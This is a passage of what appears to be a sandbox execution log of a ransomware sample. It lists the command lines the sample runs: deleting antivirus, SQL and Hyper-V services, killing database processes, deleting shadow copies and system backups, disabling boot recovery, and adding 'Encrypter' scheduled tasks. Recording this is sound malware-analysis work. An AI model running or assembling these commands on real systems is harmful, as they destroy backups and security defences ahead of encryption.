C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQL$WOLTERSKLUWER"
2⤵
PID:2284

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$PROGID"
2⤵
PID:2304

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$WOLTERSKLUWER"
2⤵
PID:2332

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher$OPTIMA"
2⤵
PID:2364

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQL$OPTIMA"
2⤵
PID:2392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$OPTIMA"
2⤵
PID:2424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "ReportServer$OPTIMA"
2⤵
PID:2460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "msftesql$SQLEXPRESS"
2⤵
PID:2484

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "postgresql-x64-9.4"
2⤵
PID:2504

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Webroot"
2⤵
PID:2540

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "WRSVC"
2⤵
PID:2568

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "AV: ESET"
2⤵
PID:2588

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "ekrn"
2⤵
PID:2628

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Kaspersky"
2⤵
PID:2652

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klim6"
2⤵
PID:2680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "AVP18.0.0"
2⤵
PID:2712

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "KLIF"
2⤵
PID:2740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klpd"
2⤵
PID:2772

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klflt"
2⤵
PID:2800

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klbackupdisk"
2⤵
PID:2820

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klbackupflt"
2⤵
PID:2852

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klkbdflt"
2⤵
PID:2876

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klmouflt"
2⤵
PID:2908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klhk"
2⤵
PID:2932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "KSDE1.0.0"
2⤵
PID:2968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "kltap"
2⤵
PID:2992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Trend Micro"
2⤵
PID:3016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TmFilter"
2⤵
PID:3040

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TMLWCSService"
2⤵
PID:2104

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "tmusa"
2⤵
PID:2148

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TmPreFilter"
2⤵
PID:2256

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TMSmartRelayService"
2⤵
PID:2344

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TMiCRCScanService"
2⤵
PID:2468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "VSApiNt"
2⤵
PID:2560

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TmCCSF"
2⤵
PID:2668

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "tmlisten"
2⤵
PID:2720

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TmProxy"
2⤵
PID:2808

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "ntrtscan"
2⤵
PID:2900

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "UniFi"
2⤵
PID:3024

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "ofcservice"
2⤵
PID:2944

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Kill "SQL"
2⤵
PID:2328

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im sqlbrowser.exe
2⤵
PID:2616

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im sqlwriter.exe
2⤵
PID:3060

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe
2⤵
PID:3084

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im msmdsrv.exe
2⤵
PID:3108

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im MsDtsSrvr.exe
2⤵
PID:3132

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im sqlceip.exe
2⤵
PID:3152

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe
2⤵
PID:3184

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im Ssms.exe
2⤵
PID:3204

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im SQLAGENT.EXE
2⤵
PID:3232

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im fdhost.exe
2⤵
PID:3256

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe
2⤵
PID:3276

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im ReportingServicesService.exe
2⤵
PID:3308

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im msftesql.exe
2⤵
PID:3324

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe
2⤵
PID:3300

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im pg_ctl.exe
2⤵
PID:3356

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im postgres.exe
2⤵
PID:3396

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Kill
2⤵
PID:3424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im UniFi.exe
2⤵
PID:3440

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq MsMpEng.exe" | find /c "PID" && Echo Windows Defender
2⤵
PID:3472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq ntrtscan.exe" | find /c "PID" && Echo Trend Micro Security
2⤵
PID:3496

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq avp.exe" | find /c "PID" && Echo Kaspersky Endpoint Security
2⤵
PID:3512

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq WRSA.exe" | find /c "PID" && Echo Webroot
2⤵
PID:3532

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq egui.exe" | find /c "PID" && Echo ESET
2⤵
PID:3564

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq AvastUI.exe" | find /c "PID" && Echo Avast
2⤵
PID:3588

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" vssadmin.exe Delete Shadows /All /Quiet
2⤵
PID:3620

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet
2⤵
PID:3656

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
3⤵
- Interacts with shadow copies
PID:3712

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} recoveryenabled No
2⤵
PID:3676

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
2⤵
PID:3700

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP
2⤵
PID:3736

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE
2⤵
PID:3752

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic SHADOWCOPY DELETE
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3816

C:\Windows\SysWOW64\wbem\WMIC.exe
"C:\Windows\System32\wbem\WMIC.exe" wmic SHADOWCOPY DELETE
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3792

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Encrypter /TR C:\Users\Admin\AppData\Roaming\norapid.exe
2⤵
- Creates scheduled task(s)
PID:3840

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC ONLOGON /TN EncrypterSt /TR C:\Users\Admin\AppData\Roaming\norapid.exe
2⤵
- Creates scheduled task(s)
PID:3860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\rapidrecovery.txt.txt
2⤵
PID:4052

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3832

C:\Windows\system32\taskeng.exe
taskeng.exe {BD538C07-1139-4ACA-8814-435B2182BF93} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
PID:3568

C:\Users\Admin\AppData\Roaming\norapid.exe
C:\Users\Admin\AppData\Roaming\norapid.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
PID:3588

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "Hyper-V"
3⤵
PID:3012

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmickvpexchange"
3⤵
PID:3312

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmicguestinterface"
3⤵
PID:3328

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmicshutdown"
3⤵
PID:3356

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmicheartbeat"
3⤵
PID:1300

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmicrdv"
3⤵
PID:1716

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "storflt"
3⤵
PID:1688

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmictimesync"
3⤵
PID:1196

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmicvss"
3⤵
PID:276

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "SQL"
3⤵
PID:1736

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher"
3⤵
PID:2112

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQLSERVER"
3⤵
PID:2372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLSERVERAGENT"
3⤵
PID:2448

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLBrowser"
3⤵
PID:2532

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY"
3⤵
PID:2648

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MsDtsServer130"
3⤵
PID:2760

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SSISTELEMETRY130"
3⤵
PID:2824

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLWriter"
3⤵
PID:2936

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQL$VEEAMSQL2012"
3⤵
PID:3068

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$VEEAMSQL2012"
3⤵
PID:3056

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQL"
3⤵
PID:2444

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLAgent"
3⤵
PID:2500

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQLServerADHelper100"
3⤵
PID:2584

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQLServerOLAPService"
3⤵
PID:3156

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MsDtsServer100"
3⤵
PID:3284

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "ReportServer"
3⤵
PID:2228

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY$HL"
3⤵
PID:3316

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TMBMServer"
3⤵
PID:2768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQL$PROGID"
3⤵
PID:2796

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQL$WOLTERSKLUWER"
3⤵
PID:2952

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$PROGID"
3⤵
PID:3464

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$WOLTERSKLUWER"
3⤵
PID:1180

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher$OPTIMA"
3⤵
PID:828

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQL$OPTIMA"
3⤵
PID:2188

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$OPTIMA"
3⤵
PID:1448

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "ReportServer$OPTIMA"
3⤵
PID:556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "msftesql$SQLEXPRESS"
3⤵
PID:3396

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "postgresql-x64-9.4"
3⤵
PID:1460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Webroot"
3⤵
PID:2116

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "WRSVC"
3⤵
PID:2200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "AV: ESET"
3⤵
PID:2360

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "ekrn"
3⤵
PID:3408

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Kaspersky"
3⤵
PID:2128

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klim6"
3⤵
PID:2388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "AVP18.0.0"
3⤵
PID:2460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "KLIF"
3⤵
PID:2540

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klpd"
3⤵
PID:2680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klflt"
3⤵
PID:2556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klbackupdisk"
3⤵
PID:2672

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klbackupflt"
3⤵
PID:2852

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klkbdflt"
3⤵
PID:2908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klmouflt"
3⤵
PID:2968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klhk"
3⤵
PID:2328

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "KSDE1.0.0"
3⤵
PID:3132

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "kltap"
3⤵
PID:3240

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Trend Micro"
3⤵
PID:3256

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TmFilter"
3⤵
PID:2512

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TMLWCSService"
3⤵
PID:2576

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "tmusa"
3⤵
PID:2812

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TmPreFilter"
3⤵
PID:2924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TMSmartRelayService"
3⤵
PID:3144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TMiCRCScanService"
3⤵
PID:3268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "VSApiNt"
3⤵
PID:2260

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TmCCSF"
3⤵
PID:2560

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "tmlisten"
3⤵
PID:3060

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TmProxy"
3⤵
PID:1384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "ntrtscan"
3⤵
PID:1400

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "ofcservice"
3⤵
PID:908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "UniFi"
3⤵
PID:2740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Kill "SQL"
3⤵
PID:2720

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im sqlbrowser.exe
3⤵
PID:2920

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im sqlwriter.exe
3⤵
PID:2320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe
3⤵
PID:2456

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im msmdsrv.exe
3⤵
PID:3196

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im MsDtsSrvr.exe
3⤵
PID:3696

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im sqlceip.exe
3⤵
PID:3740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe
3⤵
PID:3764

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im Ssms.exe
3⤵
PID:3872

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im SQLAGENT.EXE
3⤵
PID:3716

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im fdhost.exe
3⤵
PID:3656

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe
3⤵
PID:3908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe
3⤵
PID:3860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im ReportingServicesService.exe
3⤵
PID:3960

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im msftesql.exe
3⤵
PID:3796

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im pg_ctl.exe
3⤵
PID:3968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im postgres.exe
3⤵
PID:3756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Kill
3⤵
PID:1096

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im UniFi.exe
3⤵
PID:4056

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq MsMpEng.exe" | find /c "PID" && Echo Windows Defender
3⤵
PID:3292

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq ntrtscan.exe" | find /c "PID" && Echo Trend Micro Security
3⤵
PID:3436

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq avp.exe" | find /c "PID" && Echo Kaspersky Endpoint Security
3⤵
PID:3412

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq WRSA.exe" | find /c "PID" && Echo Webroot
3⤵
PID:4088

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq egui.exe" | find /c "PID" && Echo ESET
3⤵
PID:3472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq AvastUI.exe" | find /c "PID" && Echo Avast
3⤵
PID:3496

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" vssadmin.exe Delete Shadows /All /Quiet
3⤵
PID:3508

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet
3⤵
PID:3512

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:4004

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} recoveryenabled No
3⤵
PID:1640

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
3⤵
PID:3608

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP
3⤵
PID:1208

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE
3⤵
PID:2052

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic SHADOWCOPY DELETE
4⤵
PID:2900

C:\Windows\SysWOW64\wbem\WMIC.exe
"C:\Windows\System32\wbem\WMIC.exe" wmic SHADOWCOPY DELETE
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2632

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Encrypter /TR C:\Users\Admin\AppData\Roaming\norapid.exe
3⤵
- Creates scheduled task(s)
PID:3368

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC ONLOGON /TN EncrypterSt /TR C:\Users\Admin\AppData\Roaming\norapid.exe
3⤵
- Creates scheduled task(s)
PID:3648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\rapidrecovery.txt.txt
3⤵
PID:3516

C:\Users\Admin\AppData\Roaming\norapid.exe
C:\Users\Admin\AppData\Roaming\norapid.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Suspicious behavior: GetForegroundWindowSpam
PID:3120

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "Hyper-V"
3⤵
PID:828

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmickvpexchange"
3⤵
PID:2504

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmicguestinterface"
3⤵
PID:556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmicshutdown"
3⤵
PID:3396

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmicheartbeat"
3⤵
PID:1460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmicrdv"
3⤵
PID:2388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "storflt"
3⤵
PID:2936

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmictimesync"
3⤵
PID:2212

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmicvss"
3⤵
PID:2580

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "SQL"
3⤵
PID:3360

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher"
3⤵
PID:1600

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQLSERVER"
3⤵
PID:3404

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLSERVERAGENT"
3⤵
PID:2924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLBrowser"
3⤵
PID:3008

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY"
3⤵
PID:2180

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MsDtsServer130"
3⤵
PID:1088

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SSISTELEMETRY130"
3⤵
PID:2692

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLWriter"
3⤵
PID:2932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQL$VEEAMSQL2012"
3⤵
PID:2672

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$VEEAMSQL2012"
3⤵
PID:2636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQL"
3⤵
PID:3280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLAgent"
3⤵
PID:2620

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQLServerADHelper100"
3⤵
PID:3688

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQLServerOLAPService"
3⤵
PID:3712

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MsDtsServer100"
3⤵
PID:1696

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "ReportServer"
3⤵
PID:2568

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY$HL"
3⤵
PID:2216

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TMBMServer"
3⤵
PID:1096

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQL$PROGID"
3⤵
